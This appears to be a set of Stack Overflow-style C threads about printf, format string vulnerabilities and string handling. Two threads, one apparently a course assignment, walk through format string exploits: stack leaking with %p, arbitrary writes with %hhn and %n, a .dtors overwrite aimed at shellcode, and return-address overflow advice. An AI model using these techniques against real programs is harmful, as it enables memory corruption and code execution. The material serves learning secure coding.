How do I use formatstring to print out a string? - c

I'm going through tutorials on format string vulnerabilities to learn how to code more securely. The program I've written so far is as follows:
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main(int argc, char *argv[]) {
char text[100];
strcpy(text, argv[1]);
printf(text);
}
I'm running it like this:
>>> ./foo $(ruby -e 'print "AAAA" + "%08x."*9 + "%x"')
AAAAffe466f4.00000001.f763b1c9.ffe458df.ffe458de.00000000.ffe459c4.ffe45964.00000000.41414141
I can see the "41414141" at the end, which is the AAAA at the beginning of the string. However, when I use "%s" instead like so:
>>> ./foo $(ruby -e 'print "AAAA" + "%08x."*9 + "%s"')
I get a segfault. Can anyone point me in the right direction?

The thing is that at this point you reach the raw AAAA bytes on the stack, whereas the %s specifier expects a pointer to a string, i.e. the address of your AAAA. There is no format specifier for what you want, because in the normal course of execution you wouldn't have a string pasted directly into printf()'s argument area. One idea would be %c%c%c%c, to at least print the data as characters instead of hex values, but that will not work either: arguments narrower than int are promoted to int when passed to a variadic function, so each %c consumes a whole int-sized slot rather than a single byte.

It's generally unsafe to pass a dynamic string as printf's format, since you can't guarantee that the string is free of format specifiers, and any specifier without a matching argument is undefined behaviour. The correct thing is to say,
printf("%s", text);
or just
puts(text);
Now, that said, your first example comes down to printf("%x%x");. This is of course UB, but the two %x specifiers just make you read a bounded amount off the stack (two words), which will print garbage, but only a finite amount.
On the other hand, when you say printf("%s"), the function expects a pointer to a null-terminated sequence of bytes in a memory region which you do not control! Essentially, the function will read one word off the stack, pretend it is a pointer, and read the memory pointed to by that value -- which will almost certainly cause a segmentation fault, since you aren't allowed to access most memory addresses by default. And even if the address points into memory you're allowed to access, there's no reason there should be a zero byte coming up soon, and so you may well just run off the page and into illegal memory.

In text you have %s at the end. printf expects a char pointer when it encounters %s, but you don't provide one --> segfault. Use puts(text) instead, or printf("%s", text);
$ ruby -e 'print "AAAA" + "%08x."*9 + "%x"'
AAAA%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%x
$ ruby -e 'print "AAAA" + "%08x."*9 + "%s"'
AAAA%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%s
Both strings are invalid for printf because you are not passing the arguments required.

Related

C sprintf exploit (formatting attack)

I want to write the integer 1 to the address 0x08049940 using a format string exploit (specifically via sprintf).
This is what the function looks like:
void greet(char *s) {
char buf[666];
sprintf(buf, "Hello %s!\n", s);
printf(buf);
}
I tried multiple tutorials, but I believe they don't work because my string already starts with "Hello ". So I tried to start writing lower, using the input
%.1%n\x39\x99\x04\x08
which is 7 values lower, as well as other addresses in the neighbourhood of the original one. Yet my gdb debugger keeps telling me that the value stored at 0x08049940 is still the default one specified in the code.
The format string attack targets the later printf call, not the sprintf.
Exploiting this is rather easy if you can observe the output. Instead of going for the exploit directly, you can craft a string with enough %p or %x conversions until you see your desired bytes. For example, this program works for me:
#include <stdio.h>
void greet(char *s) {
char buf[666];
sprintf(buf, "Hello %s!\n", s);
printf(buf);
}
int main(void) {
greet("aaaaaa%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p"
"%p%p%p%p%p%p%p%0#p\x01\x02\x03\x04");
}
I compile with gcc -m32 and run, the output is
Hello aaaaaaaa0x566386f00x566386fc0x566385ac0xf7f4e5580x1
0x10x566386fc0x6548d9a40x206f6c6c0x616161610x61616161
0x702570250x702570250x702570250x702570250x70257025
0x702570250x702570250x702570250x702570250x70257025
0x702570250x702570250x4030201!
Now that we see the 0x04030201, we can change the final %0#p to %hhn to write one byte to the address, or %hn for a short, or %n for int. This number is the count of characters written so far, converted to char, short or int.
When we know where in stack the address is, we can change each %p to %c and we know that it is going to consume exactly one character, giving better control over the resulting number.
We've got some slack with the a's at the beginning. This can be used to adjust the field width of one of the conversions, and so change the number of characters written as desired (for example, if the resulting number is 123 too low, it can be raised by printing one character with a 124-character field width: %124c); the extra count can be offset by removing 3 a's from the prompt.
Again this can be verified by using %0#p:
greet("aaa%123c%c%c%c%c%c%p%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%0#p\x01\x02\x03\x04");
and we get:
Hello aaa
���X0x565e46fc�la1%%%%%%%%%%%%0x4030201!
Finally we just replace %0#p with %hhn and there be magic.
To demonstrate that it really is writing to the address 0x04030201, you can use gdb to find out the address that caused the violation:
Program received signal SIGSEGV, Segmentation fault.
0xf7e216aa in vfprintf () from /lib32/libc.so.6
(gdb) p $_siginfo._sifields._sigfault.si_addr
$1 = (void *) 0x4030201
And the rest is left as an exercise to the reader...

**argv contains more characters than expected

First, I need to execute two commands with system(). For example, I receive a string and open it with a text editor, like this:
$ ./myprogram string1
And the output should be a command like this:
$ vim string1
But, I cannot find a way to do this like this pseudo code:
system("vim %s",argv[1]); //Error:
test.c:23:3: error: too many arguments to function 'system'
system("vim %s",argv[1]);
Therefore, my solution is to store argv[1] in a char array that is already initialized with four characters, like this:
char command[strlen(argv[1])+4];
command[0] = 'v'; command [1] = 'i'; command[2] = 'm'; command[3] = ' ';
And assign the argv[1] to my new char array:
for(int i = 0; i < strlen(argv[1]) ; i++)
command[i+4] = argv[1][i];
And finally:
system(command);
If the argument given to my program has fewer than 3 characters, it works fine, but if not, some weird characters that I do not expect appear in the output, like this:
./myprogram 1234
And the output is:
$ vim 12348�M�
How can I solve this bug and why does this happen?
The full code is:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main (int argc,char **argv) {
char command[strlen(argv[1])+4];
command[0] = 'v'; command [1] = 'i'; command[2] = 'm'; command[3] = ' ';
for(int i = 0; i < strlen(argv[1]) ; i++)
command[i+4] = argv[1][i];
system(command);
return 0;
}
You need to NUL terminate your C-style strings, and that includes allocating enough memory to hold the NUL.
Your array is a byte short (must be char command[strlen(argv[1])+4+1]; to leave space for NUL), and you should probably just use something like sprintf to fill it in, e.g.:
sprintf(command, "vim %s", argv[1]);
That's simpler than manual loops, and it also fills in the NUL for you.
The garbage you see is caused by the search for the NUL byte (which terminates the string) wandering off into unrelated (and undefined for that matter) memory that happens to occur after the buffer.
The reason you're running into problems is that you aren't terminating your command string with a NUL character. But you really want to use sprintf (or, even better, snprintf) for something like this. It works similarly to printf but outputs to memory instead of stdout and handles the terminating NUL for you. E.g.:
char cmd[80];
snprintf(cmd, sizeof cmd, "vim %s", argv[1]);
system(cmd);
As @VTT points out, this simplified code assumes that the value in argv[1] is at most 75 characters long (80 minus 4 for "vim " minus 1 for the NUL character). One safer option would be to verify this assumption first and report an error if it isn't the case. To be more flexible you could dynamically allocate the cmd buffer:
const char *cmd = "vim ";
char *buf = malloc(strlen(argv[1]) + strlen(cmd) + 1); /* +1 for the NUL */
if (buf == NULL)
    return 1; /* allocation failed */
sprintf(buf, "%s%s", cmd, argv[1]);
system(buf);
free(buf);
Of course you should also check to be sure argc > 1.
I know that there are already good answers here, but I'd like to expand them a little bit.
I often see this kind of code
system("vim %s",argv[1]); //Error:
and beginners often wonder, why that is not working.
The reason for that is that "%s", some_string is not a feature of the C
language, the sequence of characters %s has no special meaning, in fact it is
as meaningful as the sequence mickey mouse.
The reason why that works with printf (and the other members of the
printf-family) is because printf was designed to replace sequences like
%s with a value passed as an argument. It's printf which makes %s special,
not the C language.
As you may have noticed, doing "hallo" + " world" doesn't do string
concatenation. C doesn't have a native string type that behaves like C++'s
std::string or Python's str. In C a string is just a sequence of
characters that happen to have a byte with value of 0 at the end (also called
the '\0'-terminating byte).
That's why you pass printf a format as the first argument. It tells
printf that it should print character by character unless it finds a %,
which tells printf that the next character(s) [1] is/are special and
must be substituted with a value passed as one of the subsequent arguments to printf.
The %x are called conversion specifiers and the documentation of printf
will list all of them and how to use them.
Other functions like the scanf family use a similar strategy, but that doesn't
mean that all functions in C that expect strings, will work the same way. In
fact the vast majority of C functions that expect strings, do not work in that
way.
man system
#include <stdlib.h>
int system(const char *command);
Here you see that system is a function that expects one argument only.
That's why your compiler complains with a line like this: system("vim %s",argv[1]);.
That's where functions like sprintf or snprintf come in handy.
[1] If you take a look at the printf documentation you will see that
the conversion specifier together with length modifiers can be longer than 1
character.

How do you explain the output from this function-like macro `slice` in C?

#include <stdio.h>
#define slice(bare_string,start_index) #bare_string+start_index
#define arcane_slice(bare_string,start_index) "ARCANE" #bare_string+start_index
int main(){
printf("slice(FIRSTA,0)==> `%s`\n",slice(FIRSTA,0));
printf("slice(SECOND,2)==> `%s`\n",slice(SECOND,2));
printf("slice(THIRDA,5)==> `%s`\n",slice(THIRDA,5));
printf("slice(FOURTH,6)==> `%s`\n",slice(FOURTH,6));
printf("slice(FIFTHA,7)==> `%s`\n",slice(FIFTHA,7));
printf("arcane_slice(FIRSTA,0)==> `%s`\n",arcane_slice(FIRST,0));
printf("arcane_slice(SECOND,2)==> `%s`\n",arcane_slice(SECOND,2));
printf("arcane_slice(THIRDA,5)==> `%s`\n",arcane_slice(THIRDA,5));
printf("arcane_slice(FOURTH,6)==> `%s`\n",arcane_slice(FOURTH,6));
printf("arcane_slice(FIFTHA,7)==> `%s`\n",arcane_slice(FIFTHA,7));
return 0;
}
OUTPUT:
slice(FIRSTA,0)==> `FIRSTA`
slice(SECOND,2)==> `COND`
slice(THIRDA,5)==> `A`
slice(FOURTH,6)==> ``
slice(FIFTHA,7)==> `slice(FIFTHA,7)==> `%s`
`
arcane_slice(FIRSTA,0)==> `ARCANEFIRST`
arcane_slice(SECOND,2)==> `CANESECOND`
arcane_slice(THIRDA,5)==> `ETHIRDA`
arcane_slice(FOURTH,6)==> `FOURTH`
arcane_slice(FIFTHA,7)==> `IFTHA`
I have the above C code that I need help on. I am getting weird behaviour from
the function-like macro slice that is supposed to 'slice' from a passed index
to the end of the string. It does not slice in the real sense but passes
a pointer from a certain point to printf which starts printing from that
address. I have managed to figure out that in arcane_slice the strings
are concatenated first then 'sliced'. I also have figured out that when start_index
is equal to 6 printf starts printing from the null byte and that is why
you get the 'empty' string. The strange part is when start_index is 7. It prints
the first argument to printf (the format string) concatenated with the passed bare string in both
arcane_slice and slice (as shown in the 5th and 10th lines of the output).
Why is that so?
My wildest guess is that when the start_index exceeds the length of the strings,
the pointer points to the start of the data segment in the program's address space. But
then you could counter that with "why didn't it start printing from FIRSTA"
Not the start of the data segment. This is what I remember: when C calls a function it puts the arguments on the stack, but those arguments are only pointers. The string literals themselves live in the program's read-only data, and the compiler is free to lay them out in any order. In your build the literal for the last argument evidently ended up directly before the format string, thus:
Memory:
"FIFTHA\0slice(FIFTHA,7)==> `%s`\n\0"
Arguments:
<pointer-to-"FIFTHA"> <pointer-to-"slice...">
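Since you over-increment the first pointer, it skips the '\0' character and lands on the format string. None of this is guaranteed: reading past the terminator is undefined behaviour, and another compiler may lay the literals out differently.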
Try to experiment with this with more placeholders, like
printf("1: %s, 2: %s\n", slice(FIFTHA,7), slice(FIFTHA,6));
slice(bare_string,start_index) #bare_string+start_index
#bare_string turns the bare token into a string literal, which decays to a pointer to its first character. Adding start_index then gives a pointer start_index characters further on, and that is what printf receives. The same thing happens with an ordinary array:
char str[6]="Hello";
printf("%s\n",str);//prints Hello
printf("%s\n",str+1);//prints ello
printf("%s\n",str+2);//prints llo
printf("%s\n",str+3);//prints lo
printf("%s\n",str+4);//prints o
printf("%s %c=%d \n",str+5,*(str+5),*(str+5));//str+5 is the terminating NUL: empty string, value 0
printf("%s %c=%d \n",str+6,*(str+6),*(str+6));//undefined behaviour: reads one past the end of the array
printf("%s %c=%d \n",str+7,*(str+7),*(str+7));//undefined behaviour: even forming str+7 is invalid
The same scenario is happening in your case.
Test Code:
#include <stdio.h>
int main(void)
{
    char str[6] = "Hello";
    printf("%s\n", str);     // prints Hello
    printf("%s\n", str + 1); // prints ello
    printf("%s\n", str + 2); // prints llo
    printf("%s\n", str + 3); // prints lo
    printf("%s\n", str + 4); // prints o
    // str+5 is the terminating NUL: empty string, value 0
    printf("%s %c=%d \n", str + 5, *(str + 5), *(str + 5));
    // undefined behaviour: reads one past the end of the array
    printf("%s %c=%d \n", str + 6, *(str + 6), *(str + 6));
    // undefined behaviour: even forming str+7 is invalid
    printf("%s %c=%d \n", str + 7, *(str + 7), *(str + 7));
    return 0;
}
You have answered your question yourself. "FIFTHA"+7 points one past the end of the string literal's array (six characters plus the terminating NUL); reading through that pointer, as printf's %s does, is undefined behavior in C.
There's no easy way to get a more Python-like behavior for such "slices" in C. You could make it work for indexes up to a certain upper limit by adding a suffix to your string, full of zero bytes:
#define slice(bare_string,start_index) ((#bare_string "\0\0\0\0\0\0\0")+(start_index))
Also, when using macros, it's good practice (and avoids bugs too) to use parentheses liberally.
#define slice(bare_string,start_index) ((#bare_string)+(start_index))
#define arcane_slice(bare_string,start_index) (("ARCANE" #bare_string)+(start_index))

how can I printf in c

How can I make this print properly without using two printf calls?
char* second = "Second%d";
printf("First%d"second,1,2);
The code you showed us is syntactically invalid, but I presume you want to do something that has the same effect as:
printf("First%dSecond%d", 1, 2);
As you know, the first argument to printf is the format string. It doesn't have to be a literal; you can build it any way you like.
Here's an example:
#include <stdio.h>
#include <string.h>
int main(void)
{
char *second = "Second%d";
char format[100];
strcpy(format, "First%d");
strcat(format, second);
printf(format, 1, 2);
putchar('\n');
return 0;
}
Some notes:
I've added a newline after the output. Output text should (almost) always be terminated by a newline.
I've set an arbitrary size of 100 bytes for the format string. More generally, you could declare
char *format;
and initialize it with a call to malloc(), allocating the size you actually need (and checking that malloc() didn't signal failure by returning a null pointer); you'd then want to call free(format); after you're done with it.
As templatetypedef says in a comment, this kind of thing can be potentially dangerous if the format string comes from an uncontrolled source.
(Or you could just call printf twice; it's not that much more expensive than calling it once.)
Use the preprocessor to concatenate the two strings.
#define second "Second%d"
printf("First%d"second,1,2);
Do not do this in a real program.
char *second = "Second %d";
char *first = "First %d";
char largebuffer[256];
strcpy (largebuffer, first);
strcat (largebuffer, second);
printf (largebuffer, 1, 2);
The problem with generated formats such as the one above is that printf(), since it takes a variable-length argument list, has no way of knowing how many arguments were actually provided. It simply walks the format string and, for each conversion, picks an argument of the described type from the argument list.
If you provide the correct number of arguments like in the example above in which there are two %d formats and there are two integers provided to be printed in those places, everything is fine. However what if you do something like the following:
char *second = "Second %s";
char *first = "First %d";
char largebuffer[256];
strcpy (largebuffer, first);
strcat (largebuffer, second);
printf (largebuffer, 1);
In this example the printf() function is expecting the format string as well as a variable number of arguments. The format string says that there will be two additional arguments, an integer and a zero-terminated character string. However, only one additional argument is provided, so the printf() function will just use whatever happens to be in the next argument slot as a pointer to a zero-terminated character string.
If you are lucky, the data that the printf() function interprets as a pointer will be a valid memory address for your application and the memory area pointed to will be a couple of characters terminated by a zero. If you are less lucky, the pointer will be zero or garbage and you will get an access violation right then, and it will be easy to find the cause of the application crash. If you have no luck at all, the pointer will be good enough that it points to a valid region holding something like 2K of characters before the next zero, and printf() will wander off into the weeds, leaving you with output or crash data that is pretty useless.
char *second = "Second%d";
char tmp[256];
memset(tmp, 0, 256);
sprintf(tmp, second, 2);
printf("First%d%s", 1,tmp);
Or something like that
I'm assuming you want the output:
First 1 Second 2
To do this we need to understand printf's functionality a little better. The real reason that printf is so useful is that it not only prints strings, but also formats variables for you. Depending on how you want your variable formatted, you need to use different formatting characters. %d tells printf to format the variable as a signed integer, which you already know. However, there are other formats, such as %f for floats and doubles, %ld for long integers, and %s for strings, or char*.
Using the %s formatting character to print your char* variable, second, our code looks like this:
char* second = "Second";
printf ( " First %d %s %d ", 1, second, 2 );
This tells printf that you want the first variable formatted as an integer, the second as a string, and the third as another integer.

Format String Vulnerability troubles

So I have this function:
void print_usage(char* arg)
{
char buffer[640];
sprintf(buffer, "Usage: %s [options]\n"
"Randomly generates a password, optionally writes it to /etc/shadow\n"
"\n"
"Options:\n"
"-s, --salt <salt> Specify custom salt, default is random\n"
"-e, --seed [file] Specify custom seed from file, default is from stdin\n"
"-t, --type <type> Specify different encryption method\n"
"-v, --version Show version\n"
"-h, --help Show this usage message\n"
"\n"
"Encryption types:\n"
" 0 - DES (default)\n"
" 1 - MD5\n"
" 2 - Blowfish\n"
" 3 - SHA-256\n"
" 4 - SHA-512\n", arg);
printf(buffer);
}
I wish to utilize a format string vulnerability attack (my assignment). Here is my attempt:
I have an exploit program which fills a buffer with NOPs and shellcode (I have used this program to overflow the buffer in the same function, so I know it's good). Now, I did an object dump of the file to find the .dtors_list address and I got 0x0804a20c; adding 4 bytes to get the end, I get 0x804a210.
Next I used gdb to find the address at which my NOPs begin while running my program. Using this I got 0xffbfdbb8.
So up to this point I feel like I'm correct. Now I know I want to use a format string to copy the NOP address into my .dtors_end address. Here is the string I came up with (this is the string I'm providing as user input to the function):
"\x10\xa2\x04\x08\x11\xa2\x04\x08\x12\xa2\x04\x08\x13\xa2\x04\x08%%.168u%%1$n%%.51u%%2$n%%.228u%%3$n%%.64u%%4$n"
This doesn't work for me. The program runs normally and the %s is replaced with the string I input (minus the little endian memory address at the front, and the two percent signs are now one percent sign for some reason).
Anyways, I'm kind of stumped here, any help would be appreciated.
Disclaimer: I'm no expert.
You're passing "\x10\xa2\x04\x08\x11\xa2\x04\x08\x12\xa2\x04\x08\x13\xa2\x04\x08%%.168u%%1$n%%.51u%%2$n%%.228u%%3$n%%.64u%%4$n" as the value of arg? That means that buffer will contain
"Usage:\x20\x10\xa2\x04\x08\x11\xa2\x04\x08\x12\xa2\x04\x08\x13\xa2\x04\x08%.168u%1$n%.51u%2$n%.228u%3$n%.64u%4$n [options]\x0aRandomly..."
Now let's further assume that you're on an x86-32 target (if you're on x86-64, this won't work), and that you're compiling with an optimization level that doesn't put anything in print_usage's stack frame except for the 640-byte buffer array.
Then printf(buffer) will do the following things, in order:
Push the 4-byte address &buffer.
Push a 4-byte return address.
Invoke printf...
Print out "Usage:\x20\x10\xa2\x04\x08\x11\xa2\x04\x08\x12\xa2\x04\x08\x13\xa2\x04\x08" (a sequence of 23 bytes).
%.168u: Interpret the next argument to printf as an unsigned int and print it with a precision of 168, i.e. zero-padded to at least 168 digits. Since printf has no next argument, this is actually going to print the next thing on the stack; that is, the first four bytes of buffer; that is, "Usag" (0x67617355).
%1$n: Interpret the second argument to printf as a pointer to int and store 23+168 at that location. This stores 0x000000bf in location 0x67617355. So this is your main problem: "Usage: " is 7 bytes long, so you should have added one junk byte to the front of your arg to pad the prefix to 8 bytes (two 4-byte argument slots) and used %3$n instead of %1$n. (Incidentally, notice that GNU says "If any of the formats has a specification for the parameter position all of them in the format string shall have one. Otherwise the behavior is undefined." So you should go through and add 1$s to all your %us just to be on the safe side.)
%.51u: Print another 51 characters of garbage.
%2$n: Interpret the third argument to printf as a pointer to int and store 0x000000f2 in that garbage location. As above, this should have been %4$n.
... etc. etc. ...
So, your major bug here is that you forgot to account for the "Usage: " prefix.
I assume you were trying to store the four bytes 0xffbfdbb8 into address 0x804a210. Let's say you'd gotten that to work. But then what would your next step be? How do you get the program to treat the four-byte quantity at 0x804a210 as a function pointer and jump through it?
The traditional way to exploit this code would be to exploit the buffer overflow in sprintf, rather than the more complicated "%n" vulnerability in printf. You just need to make your arg roughly 640 characters long and make sure that the 4 bytes of it that correspond to print_usage's return address contain the address of your NOP sled.
Even that part is tricky, though. You might conceivably be running into something related to ASLR: just because your sled exists at address 0xffbfdbb8 in one run doesn't mean it'll exist at that same address in the next run.
Does this help?

Resources